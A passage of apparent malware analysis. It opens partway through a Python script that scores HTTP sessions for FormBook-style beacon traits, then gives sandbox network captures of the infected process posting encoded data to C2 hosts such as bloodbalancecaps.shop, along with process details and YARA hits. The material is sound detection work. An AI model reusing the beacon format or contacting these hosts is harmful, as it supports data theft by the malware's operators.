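                     "EVgfvaSHwVSVQQsrstzbcxu1bbDT6tVUGVI0fP+a8SQJbkJBTpBfXMo="),
    HttpSession(44, PROC, "GET", "www.cstrategy.online",
                "/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7+hR5I2wPXRunqm38WzEuQm6NKJG/l1bLZhOfnTn2"
                "NFbWxBmCDQqA3K9Xvzl9TW5cdeUdvoi/F++BAfC2g+APWC2NffnCCUzK9ka60xikyw==&m8=urJ0WtmP0FPTTB",
                SAMPLE_UA, status=301),
    HttpSession(45, PROC, "POST", "www.bloodbalancecaps.shop", "/r9qi/", SAMPLE_UA, status=404,
                body="DzLTc=XoYVAg5jZFqy+sdfEKpm0T3ML2xPf2ianWxEAKqzwtJ+bQWvd0KWQ5MHAyJDLUNJdnjU9C"
                     "UwGof6f9VO2T2wbjAgjjDmn93JJyVsnaQoQ7jANrKlNmo+Whvacjim4eCTSsAYr8+Wo05rYPlWyf"
                     "js7g/4dUkhctsXTbLP5RuDpPabjiLQhzvYnzYZCyZ2DNeSBWXs95Q="),
]
# Constructed benign control (assumption, not from the report): an ordinary browser login.
CONTROL = HttpSession(
    0, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "POST", "www.example.com",
    "/account/login", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
    body="user=alice&password=hunter2", status=200)

def split_params(raw: str) -> List[Tuple[str, str]]:
    """Split key=value pairs without URL-decoding: '+' and '/' are base64 symbols here."""
    pairs = []
    for part in raw.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs.append((key, value))
    return pairs

def analyse(s: HttpSession) -> Finding:
    """Score one session; each reason names the trait that matched."""
    f = Finding(s.session)
    if s.process.lower().endswith(".exe") and "(X11; Linux" in s.user_agent:
        f.score += 3
        f.reasons.append("ua_os_mismatch")      # Windows process claiming to be Linux
    m = CHROME_MAJOR.search(s.user_agent)
    if m and int(m.group(1)) < 60:
        f.score += 1
        f.reasons.append("stale_chrome_ua")     # Chrome 31 is a 2013 release
    path, _, query = s.target.partition("?")
    if SHORT_PATH.match(path):
        f.score += 1
        f.reasons.append("short_path")
    params = split_params(s.body if s.method == "POST" else query)
    if params and all(len(k) <= 6 for k, _ in params) and any(B64_BLOB.match(v) for _, v in params):
        f.score += 3
        f.reasons.append("opaque_blob_param")   # short key carrying one long opaque value
    return f

def flagged(sessions: List[HttpSession], threshold: int = 5) -> List[int]:
    """Session IDs whose score reaches the (assumed) alert threshold."""
    return [s.session for s in sessions if analyse(s).score >= threshold]

def acknowledged_hosts(sessions: List[HttpSession]) -> List[str]:
    """Hosts that answered 2xx; empty here, since every reply above is a 301 or a 404."""
    return sorted({s.host for s in sessions if 200 <= s.status < 300})

if __name__ == "__main__":
    for s in SESSIONS + [CONTROL]:
        print(s.session, s.host, analyse(s).score, analyse(s).reasons)
    print("flagged:", flagged(SESSIONS + [CONTROL]), "acknowledged:", acknowledged_hosts(SESSIONS))
```

The three transcribed sessions each score 8 and the control scores 0, so the request shape alone separates them. The replies matter for triage rather than detection: a 301 to HTTPS and a WordPress 404 mean none of these hosts accepted the beacon in this run (the sample does not follow the redirect; it moves on to the next host), so `acknowledged_hosts` is empty, and blocking only the hosts that answered would block nothing. Because the beacon is sent over plain HTTP, the body is visible to this kind of inspection; a sample that did follow the redirect to HTTPS would need proxy or TLS-termination logs instead.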


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 50022 | 108.179.253.197 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:36.009556055 CET | 658 | OUT | POST /r9qi/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.bloodbalancecaps.shop
                                                                              Origin: http://www.bloodbalancecaps.shop
                                                                              Referer: http://www.bloodbalancecaps.shop/r9qi/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 58 6f 59 56 41 67 35 6a 5a 46 71 79 2b 73 64 66 45 4b 70 6d 30 54 33 4d 4c 32 78 50 66 32 69 61 6e 57 78 45 41 4b 71 7a 77 74 4a 2b 62 51 57 76 64 30 4b 57 51 35 4d 48 41 79 4a 44 4c 55 4e 4a 64 6e 6a 55 39 43 55 77 47 6f 66 36 66 39 56 4f 32 54 32 77 62 6a 41 67 6a 6a 44 6d 6e 39 33 4a 4a 79 56 73 6e 61 51 6f 51 37 6a 41 4e 72 4b 6c 4e 6d 6f 2b 57 68 76 61 63 6a 69 6d 34 65 43 54 53 73 41 59 72 38 2b 57 6f 30 35 72 59 50 6c 57 79 66 6a 73 37 67 2f 34 64 55 6b 68 63 74 73 58 54 62 4c 50 35 52 75 44 70 50 61 62 6a 69 4c 51 68 7a 76 59 6e 7a 59 5a 43 79 5a 32 44 4e 65 53 42 57 58 73 39 35 51 3d
                                                                              Data Ascii: DzLTc=XoYVAg5jZFqy+sdfEKpm0T3ML2xPf2ianWxEAKqzwtJ+bQWvd0KWQ5MHAyJDLUNJdnjU9CUwGof6f9VO2T2wbjAgjjDmn93JJyVsnaQoQ7jANrKlNmo+Whvacjim4eCTSsAYr8+Wo05rYPlWyfjs7g/4dUkhctsXTbLP5RuDpPabjiLQhzvYnzYZCyZ2DNeSBWXs95Q=
Jan 11, 2025 09:30:36.687547922 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:30:36 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade
                                                                              Vary: Accept-Encoding
                                                                              Content-Encoding: gzip
                                                                              X-Endurance-Cache-Level: 2
                                                                              X-nginx-cache: WordPress
                                                                              Content-Length: 15190
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 5c cc 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd 67 df fc f0 ee a7 ff fe e7 6f 49 6a 33 71 7b 76 e3 7e 88 60 32 99 34 72 4b ff fc 53 c3 c5 80 45 b7 67 6f 6e 32 b0 8c 84 29 d3 06 ec a4 f1 d7 9f be a3 57 0d d2 5d df 48 96 c1 a4 31 e5 30 cb 95 b6 0d 12 2a 69 41 62 e6 8c 47 36 9d 44 30 e5 21 d0 f2 a5 4d b8 e4 96 33 41 4d c8 04 4c 7a 25 ce 16 cc b9 56 81 b2 e6 7c 0d 72 9e b1 7b ca 33 96 00 cd 35 b8 26 be 60 3a 81 f3 8a 80 b1 73 01 b7 3c 4b 7c 6e 9a 3f 1b fe 11 cc a4 c1 0a ab 1a 84 ff da 26 55 e4 ff ac 42 6d 17 6b 91 45 89 cd b8 a4 5c 5a cd a5 e1 21 75 69 3e 19 78 9e 97 df 93 de a8 fc 79 b8 e9 56 e8 d8 c6 72 8b 87 3f ff f6 af 09 97 c8 f4 b7 ff a5 08 48 07 a3 59 c4 6e ba d5 f5 d9 8d e0 f2 8e 68 10 93 f3 48 1a c7 37 06 1b a6 e7 24 c5 d3 e4 bc db 0d 84 52 51 c0 50 e6 [TRUNCATED]
                                                                              Data Ascii: ]F%+\#W|RRfZuJ9x gi9fAkgoIj3q{v~`24rKSEgon2)W]H10*iAbG6D0!M3AMLz%V|r{35&`:s<K|n?&UBmkE\Z!ui>xyVr?HYnhH7$RQPBIU^N)m0aAKfA<GeY2jc~wr-'f+|5Fuc6^)pWF+\fcBs{{62RYkLE#`E_k:/&K,ueKnN.|1exXX *t@e,G?\8v'~zrRnHuNH;"_v>E6y[Sj6Wq6z^y5>-oJo2Qq06`hF:8vS?SXi[T$L]u=58639etORN-~6-{q5cW.lN6;;ab
Jan 11, 2025 09:30:36.687566042 CET | 224 | IN | Data Raw: ab ad 27 cd 4f e0 24 4b 4e ed d7 62 d3 1a 6b b0 85 96 c4 76 00 4d 30 6f ae f7 8a f2 b5 16 cb 4b 98 4c 26 fa 67 fb eb 43 6b 23 70 b1 12 d8 cc b8 93 1f b3 43 74 54 23 16 2c 69 f8 cb 42 07 d3 f8 a5 88 ae 06 21 3e e3 78 f0 4b 11 83 17 ff 52 f4 3d 2f
                                                                              Data Ascii: 'O$KNbkvM0oKL&gCk#pCtT#,iB!>xKR=/"iNZvamd+33z/.h{"G<[r|I#XFUj=,zO&z(d15>y*&*`
Jan 11, 2025 09:30:36.687573910 CET | 1236 | IN | Data Raw: c7 50 e5 f0 c5 17 06 44 4c b8 34 96 c9 b0 36 e5 f7 ce cf 3f c4 b1 09 35 80 7c 57 1a b5 39 f0 bc 76 6f e4 b5 7c de c1 30 b3 f0 ad 80 0c a4 6d 36 2a 27 37 5a 6d 36 d1 ce f8 ef 94 b4 70 8f 17 fd a8 d1 5e cc b8 10 7f 01 16 7d a7 e1 6f 05 e6 8b b9 ff
                                                                              Data Ascii: PDL46?5|W9vo|0m6*'7Zm6p^}ojIu\(@Uy:1OG|9/}ehMh-6YP`uN#;ye'ymIy9]E:UT,GX4fs#,=W-;fy=Y
Jan 11, 2025 09:30:36.687581062 CET | 1236 | IN | Data Raw: 58 e4 2e db ee d1 1a 7f 28 8c e5 f1 dc 89 68 41 da 83 25 cb bc 75 97 87 27 14 da 42 70 e2 2c 0e 0d bd bd 1e d4 ff 8e e0 de 26 e7 65 c4 a4 00 f6 7c 77 5d 5b b0 6e 51 24 d5 10 4f ce 53 6b 73 bf db c5 14 15 05 4c 30 19 42 c8 72 d3 31 a9 ca bb 33 67
                                                                              Data Ascii: X.(hA%u'Bp,&e|w][nQ$OSksL0Br13gPnbw'x\t.;sAqNIE]NN"GQb/YNw`~=* ?|9u"-Bj?<IG8/%4x%Bp^JhJ
Jan 11, 2025 09:30:36.687588930 CET | 1236 | IN | Data Raw: fb 9c c9 08 a2 89 d5 05 fc ba d8 74 42 53 85 4d d7 8e 50 f4 01 1a a1 f5 c9 7d f7 7c b3 d1 dc db c8 39 b6 b8 57 c3 9d d2 34 d7 0a f3 ec dc 2f b3 5e a1 bd f3 4e a9 73 c0 0c 37 a5 98 db fd a2 62 b9 e2 ce c0 3c af db e3 cb ea 37 e6 20 22 9a f2 28 02
                                                                              Data Ascii: tBSMP}|9W4/^Ns7b<7 "(~u%VSP3*x(.\IZw#zI43.;9".kEp?KAC`E1\b.G.fG09&%t7[cU0&+G<irc~/'FCw9
Jan 11, 2025 09:30:36.687635899 CET | 1236 | IN | Data Raw: ef 0f 96 69 6e 9f cb e4 0a 65 ca 74 f3 00 42 eb e1 0f 19 44 9c 91 a6 63 a7 c1 28 51 58 ae a4 df bb ee 47 39 6f 2d 1e ed ad 66 82 5e 67 94 df 3f 3c 74 30 07 04 ca 21 2d 0d 0a 6b 95 5c 84 85 36 48 20 57 5c 5a d0 0f 5b 60 34 c7 66 60 29 42 60 ba e1
                                                                              Data Ascii: inetBDc(QXG9o-f^g?<t0!-k\6H W\Z[`4f`)B`RtX)RCB#nD9s#=wEUyRd>fHN-c[ p8/_Sb.uVAFKG/0hmw4.LR~/(V)
Jan 11, 2025 09:30:36.687648058 CET | 1236 | IN | Data Raw: bb bf c3 29 ce c8 47 57 1c 2a 69 35 33 16 d3 7a e5 e7 78 5a 89 77 31 70 7f 4f 24 0e 30 f1 ab a1 fb ab 4f 64 61 08 d2 96 86 09 59 70 c0 30 55 52 d9 34 ec b3 eb eb 03 62 2c d3 5c cb e8 ea a2 37 38 b0 8c 65 da 10 d3 82 5e 38 62 47 99 d1 91 4b 1b 05
                                                                              Data Ascii: )GW*i53zxZw1pO$0OdaYp0UR4b,\78e^8bGKQhq]j"H:X^vE]W=[yo}{W{W{{qlcW>r.8jeYT54DOj]T)zl
Jan 11, 2025 09:30:36.687654018 CET | 1236 | IN | Data Raw: 93 d4 3e 89 56 66 6d 91 10 10 3f 5d e4 92 0e 11 b8 25 1d 26 78 22 e3 42 88 b5 58 2b 32 21 13 61 f3 24 46 e4 4b 42 71 ab ab fa 8a d6 29 e5 25 b7 55 75 2d c3 e5 3a 7d a9 6c 73 c3 b5 c3 0d 15 6c 8e 66 a6 b1 50 b3 96 1b e4 71 71 55 84 cd cb 7d 57 cf
                                                                              Data Ascii: >Vfm?]%&x"BX+2!a$FKBq)%Uu-:}lslfPqqU}WxzbYSTWL_H}(_6} iA#Xi0 C=0VX=,%kr#Q%Lca0sm,S.Ov~^+v..so/W;l:O
Jan 11, 2025 09:30:36.687660933 CET | 1236 | IN | Data Raw: f4 9f 81 41 fb 35 28 a1 92 56 33 63 4f c4 59 a5 1f 43 3a 95 d3 a6 e0 18 da e0 b9 68 83 1a 34 16 86 20 4f 9d b1 4a 3e 8c 72 ea 7c ab f4 c3 48 a7 ce b6 4a 3f 8c 34 7c 1e d2 f0 30 d2 e8 79 48 a3 3a 67 0a 16 de a1 e5 c2 bb 44 ab 42 46 4b c4 fd c0 31
                                                                              Data Ascii: A5(V3cOYC:h4 OJ>r|HJ?4|0yH:gDBFK1::W&?>XMY-|R9ghF0SQ'uXtE*Vf24jk6.$h;WvU#Q|*w:vhU4|p_*i53W ?
Jan 11, 2025 09:30:36.687760115 CET | 1236 | IN | Data Raw: 6b 61 e1 de d2 08 42 a5 99 e5 4a ba 7e 12 5e 07 dc 4f d5 14 f4 e1 16 37 dd 72 c4 db b3 9b f2 97 f0 68 72 8e 49 b0 6a 55 e4 b9 d2 d6 50 2e 9d 1f 68 68 cc f9 ed 99 6b e4 16 cf 30 a4 69 99 9e 68 55 e4 94 1b 2a d8 5c 15 96 f6 c8 2d f9 72 91 31 9d 70
                                                                              Data Ascii: kaBJ~^O7rhrIjUP.hhk0ihU*\-r1pL[AFz87WHX?YeBikI6I6S>x^Xc|$#G7v Ox^[=[^.J"!tkC%LBfO:?4W'hh8
Jan 11, 2025 09:30:36.692517996 CET | 1236 | IN | Data Raw: 36 fd 56 a0 79 25 c6 c8 a0 d3 1f 75 7a bd 31 89 81 d9 02 c1 7d 02 ef 63 cc 7b cf 31 fb bd 99 26 6d c2 a2 88 3b d1 98 78 1f 16 c6 aa ec 7d a0 81 dd e5 0a 69 98 36 e6 ab dc f2 8c 7f 84 e8 bd eb a0 95 78 ef 68 70 99 b8 4b a8 7a bd 0f 59 98 c2 98 18
                                                                              Data Ascii: 6Vy%uz1}c{1&m;x}i6xhpKzYoOh\#{d=N]$Q*6)Y`sjf,oy3g{T)7lR&^q(BIF$MDBFg,H%|\iyD4$LF{OR


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.2.8 | 50023 | 108.179.253.197 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:39.150762081 CET | 678 | OUT | POST /r9qi/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.bloodbalancecaps.shop
                                                                              Origin: http://www.bloodbalancecaps.shop
                                                                              Referer: http://www.bloodbalancecaps.shop/r9qi/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 58 6f 59 56 41 67 35 6a 5a 46 71 79 76 38 74 66 49 4a 42 6d 79 7a 33 50 42 57 78 50 52 57 69 65 6e 57 74 45 41 4c 75 6a 77 2f 74 2b 59 79 2b 76 63 31 4b 57 56 35 4d 48 4f 53 4a 47 56 6b 4e 34 64 6e 66 32 39 44 6f 77 47 6f 4c 36 66 35 52 4f 32 67 65 2f 61 7a 41 75 6f 44 44 6f 71 64 33 4a 4a 79 56 73 6e 61 30 53 51 34 54 41 4e 37 36 6c 58 48 6f 35 4a 52 76 5a 66 6a 69 6d 38 65 43 66 53 73 41 41 72 2f 37 78 6f 32 78 72 59 4e 39 57 7a 4e 4c 74 78 67 2b 53 51 30 6c 6d 62 63 4a 39 66 36 44 4f 30 51 71 69 6c 4f 53 6e 72 30 36 36 37 52 6e 65 6b 7a 77 79 43 78 78 41 47 36 44 36 62 31 48 63 6a 75 47 66 39 78 6a 6b 76 62 58 61 74 46 54 37 68 2b 6f 52 58 52 73 2f
                                                                              Data Ascii: DzLTc=XoYVAg5jZFqyv8tfIJBmyz3PBWxPRWienWtEALujw/t+Yy+vc1KWV5MHOSJGVkN4dnf29DowGoL6f5RO2ge/azAuoDDoqd3JJyVsna0SQ4TAN76lXHo5JRvZfjim8eCfSsAAr/7xo2xrYN9WzNLtxg+SQ0lmbcJ9f6DO0QqilOSnr0667RnekzwyCxxAG6D6b1HcjuGf9xjkvbXatFT7h+oRXRs/
Jan 11, 2025 09:30:39.781557083 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:30:39 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade
                                                                              Vary: Accept-Encoding
                                                                              Content-Encoding: gzip
                                                                              X-Endurance-Cache-Level: 2
                                                                              X-nginx-cache: WordPress
                                                                              Content-Length: 15190
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 5c cc 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd 67 df fc f0 ee a7 ff fe e7 6f 49 6a 33 71 7b 76 e3 7e 88 60 32 99 34 72 4b ff fc 53 c3 c5 80 45 b7 67 6f 6e 32 b0 8c 84 29 d3 06 ec a4 f1 d7 9f be a3 57 0d d2 5d df 48 96 c1 a4 31 e5 30 cb 95 b6 0d 12 2a 69 41 62 e6 8c 47 36 9d 44 30 e5 21 d0 f2 a5 4d b8 e4 96 33 41 4d c8 04 4c 7a 25 ce 16 cc b9 56 81 b2 e6 7c 0d 72 9e b1 7b ca 33 96 00 cd 35 b8 26 be 60 3a 81 f3 8a 80 b1 73 01 b7 3c 4b 7c 6e 9a 3f 1b fe 11 cc a4 c1 0a ab 1a 84 ff da 26 55 e4 ff ac 42 6d 17 6b 91 45 89 cd b8 a4 5c 5a cd a5 e1 21 75 69 3e 19 78 9e 97 df 93 de a8 fc 79 b8 e9 56 e8 d8 c6 72 8b 87 3f ff f6 af 09 97 c8 f4 b7 ff a5 08 48 07 a3 59 c4 6e ba d5 f5 d9 8d e0 f2 8e 68 10 93 f3 48 1a c7 37 06 1b a6 e7 24 c5 d3 e4 bc db 0d 84 52 51 c0 50 e6 [TRUNCATED]
                                                                              Data Ascii: ]F%+\#W|RRfZuJ9x gi9fAkgoIj3q{v~`24rKSEgon2)W]H10*iAbG6D0!M3AMLz%V|r{35&`:s<K|n?&UBmkE\Z!ui>xyVr?HYnhH7$RQPBIU^N)m0aAKfA<GeY2jc~wr-'f+|5Fuc6^)pWF+\fcBs{{62RYkLE#`E_k:/&K,ueKnN.|1exXX *t@e,G?\8v'~zrRnHuNH;"_v>E6y[Sj6Wq6z^y5>-oJo2Qq06`hF:8vS?SXi[T$L]u=58639etORN-~6-{q5cW.lN6;;ab
Jan 11, 2025 09:30:39.781579018 CET | 1236 | IN | Data Raw: ab ad 27 cd 4f e0 24 4b 4e ed d7 62 d3 1a 6b b0 85 96 c4 76 00 4d 30 6f ae f7 8a f2 b5 16 cb 4b 98 4c 26 fa 67 fb eb 43 6b 23 70 b1 12 d8 cc b8 93 1f b3 43 74 54 23 16 2c 69 f8 cb 42 07 d3 f8 a5 88 ae 06 21 3e e3 78 f0 4b 11 83 17 ff 52 f4 3d 2f
                                                                              Data Ascii: 'O$KNbkvM0oKL&gCk#pCtT#,iB!>xKR=/"iNZvamd+33z/.h{"G<[r|I#XFUj=,zO&z(d15>y*&*`PDL46
Jan 11, 2025 09:30:39.781601906 CET | 1236 | IN | Data Raw: 4a 59 e2 cf b0 05 34 0f 08 53 ae 92 6a 55 c8 08 a2 d6 1e bb 6b fc a0 26 6e f5 2e ed c8 e6 2d b7 08 73 6c f5 65 46 fd ee f7 a7 2f 53 57 bc 59 6b 11 2a a1 f4 4a aa 71 ac a4 a5 31 cb b8 98 ef c6 dc 6e f7 22 8e ed 6e 68 56 ed 71 15 13 e8 6f 24 61 72
                                                                              Data Ascii: JY4SjUk&n.-sleF/SWYk*Jq1n"nhVqo$ar:NVRBJWw\S^>Uaia\cPHGR@Sxe7S<)&Uvwtn9m.qoM%~,~4rC~Y9,?X.(hA%
Jan 11, 2025 09:30:39.781615019 CET | 1236 | IN | Data Raw: 07 f3 89 99 26 8b 65 56 b5 8f 71 86 ad 97 91 fe 10 9b bb f7 19 8f 6c 5a bd 56 c7 65 6e cc 85 f0 c3 42 6b 90 f6 9d db c7 78 2d 51 29 a6 5f ea 1a 28 6c b5 5e f0 21 2a ad 45 80 63 82 f6 7b f9 3d 31 4a f0 88 bc 0d c3 70 bc b2 cb 05 86 9d 1a 35 b3 70
                                                                              Data Ascii: &eVqlZVenBkx-Q)_(l^!*Ec{=1Jp5pixtY#nr~,~>+*Oe~zy`..\_%Or=tDo[ja[47PjA4\Ig<LG$Nsr%Uj.6d*?3tBSMP
Jan 11, 2025 09:30:39.781627893 CET | 1236 | IN | Data Raw: b5 4c 27 8b b3 37 6f 22 6e 72 c1 e6 3e a9 8a c8 67 3c cb 95 b6 4c da 31 de 06 68 05 d0 3e 91 aa e6 0a 37 9d b2 08 8d 56 77 9d 02 4f 52 eb 93 1e 7a 75 f7 a6 9a a6 e6 22 63 3a e1 d2 27 1e f1 3a de e5 a3 eb 95 38 95 34 3e a1 5e e7 31 46 c0 c2 bb 44
                                                                              Data Ascii: L'7o"nr>g<L1h>7VwORzu"c:':84>^1FDBFrE\&A]hZ)XqImm*0`kJu^{W"@.{2q]{OK|2q|vzeZn*,J=3}%%(>t_minetB
Jan 11, 2025 09:30:39.781780005 CET | 1236 | IN | Data Raw: 6a fe 56 30 0d 3e e9 8d 8f 65 0d e9 c0 27 c3 ee e0 68 d2 80 0e 7d 32 e8 0e 9f 48 ea bb a4 fe d1 a4 be 6b d7 7f a2 5d ef 82 5e 23 ef 8b ee f5 d1 b4 6b 4c f4 c9 75 b7 77 b1 97 16 2a a1 50 e7 40 b0 f0 ce 27 6f bd f2 53 9f 13 ce 19 6e 45 14 dc a4 34
                                                                              Data Ascii: jV0>e'h}2Hk]^#kLuw*P@'oSnE4l,}Y-J6.?99@s.]*byS>a^y@,f28\\kehWKxZ^Acw=/=-Jl^.p`'Uv^\`3])GW*i53zx
Jan 11, 2025 09:30:39.781790972 CET | 1236 | IN | Data Raw: 12 b3 07 9d c1 15 66 1e 4a b9 c2 94 51 c7 bb 38 92 d2 c3 94 5e cd 7d ca 22 35 a3 54 32 5b 68 26 7c 72 91 df 97 df 6b fc ea 24 60 4d af 4d 96 ff 9d fe 23 8e cb ea 08 20 47 f8 3e d6 94 8f 91 57 53 3d 3c 54 8d bf 3a df 74 ae ab 3d d8 59 15 56 70 09
                                                                              Data Ascii: fJQ8^}"5T2[h&|rk$`MM# G>WS=<T:t=YVpn90aCBQvXk,YJ&AIR?b\8,z+FY-l1p:aYm[L7w88&5^WZ=YT\>Vfm?]%
Jan 11, 2025 09:30:39.781802893 CET | 1236 | IN | Data Raw: 77 9b 1c 2b 22 ae 48 cc 93 9a 3b c8 02 88 0e dc 25 4c 08 d0 f3 03 b7 3c 63 09 1c b8 b3 2c 10 87 ee a6 3c 82 6d 36 ad c5 73 7c 10 e3 99 c6 2c e3 62 5e 57 b1 75 8d 52 a9 68 be ac 30 fc 23 f8 c4 eb 5c 69 c8 c6 0f 9d 94 19 64 83 eb a9 5a 3c c9 a0 cc
                                                                              Data Ascii: w+"H;%L<c,<m6s|,b^WuRh0#\idZ<mx+mKp$^4l~"~Y,N+sk0r&q5XS{5XTTi&Sg}C(K:$>Y-DZ?y#V;U|Wu7/t.Z R!A5(V3cOYC:
Jan 11, 2025 09:30:39.781816006 CET | 1236 | IN | Data Raw: 42 a5 cb 12 9f 48 25 e1 75 c0 fd 54 4d 41 d7 b4 28 64 04 da a9 70 b8 8f 01 a6 c3 94 ec 07 de bf 17 2c 00 d1 7e 74 51 93 c9 65 5e d8 93 32 97 84 2b 8d 0d ff 08 07 1d e1 2e d1 0f 19 13 a2 85 db 7f 26 f7 92 51 6b 11 28 8d f3 53 cd 22 5e 18 bf 33 18
                                                                              Data Ascii: BH%uTMA(dp,~tQe^2+.&Qk(S"^3hNbWU~CRu<sePk*t V3ci5~p+`e\V*m:f7>ZK<VIsOR;eTxVkaBJ~^O
Jan 11, 2025 09:30:39.781827927 CET | 1236 | IN | Data Raw: 89 dc 9e 2d 96 f7 a6 e1 2f 1a 7f 98 29 1d e5 1a 8c f9 a5 cb 11 55 b3 d0 f2 29 b7 f3 86 df 48 ad cd fd 5f ba bf 74 03 a1 54 14 30 c1 64 08 21 cb 4d 07 75 ce 7f 71 c3 70 19 8a 22 02 2c fe 80 df 88 1b fb 4b b7 a2 42 33 15 15 02 f6 61 dd 6b 04 f7 9d
                                                                              Data Ascii: -/)U)H_tT0d!Muqp",KB3ak)w\#W,GFpRq3&Jz{\axG4DC$SmWq_]0Hx~0lVrcvH;6Vy%uz1
Jan 11, 2025 09:30:39.786432981 CET | 1236 | IN | Data Raw: 33 b9 a9 48 99 8c 04 b8 9a ff 5a 5d 95 35 b7 37 66 9a 90 19 8f 6c 3a 69 f4 87 0d 92 82 73 44 75 be cf 84 c4 11 52 6b 73 bf db 9d cd 66 9d d9 a0 a3 74 d2 ed 7b 9e d7 c5 c2 06 99 72 98 7d ad ee 27 0d 8f 78 a4 3f 24 ae ac 12 8a 47 11 60 7b ab 0b 68
                                                                              Data Ascii: 3HZ]57fl:isDuRksft{r}'x?$G`{hr,r%XI3jh.64z.OvY&g:&LELrJ8,AIXfM48I%3fC4dB,3.-*l]wpH2<B%p"J0)-


                                                                              Target ID:0
                                                                              Start time:03:26:29
                                                                              Start date:11/01/2025
                                                                              Path:C:\Users\user\Desktop\qbSIgCrCgw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\qbSIgCrCgw.exe"
                                                                              Imagebase:0x3b0000
                                                                              File size:1'223'168 bytes
                                                                              MD5 hash:8057AAA332A2045B3ACB5040BAD45772
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:03:26:30
                                                                              Start date:11/01/2025
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\qbSIgCrCgw.exe"
                                                                              Imagebase:0x630000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:03:26:45
                                                                              Start date:11/01/2025
                                                                              Path:C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe"
                                                                              Imagebase:0x420000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
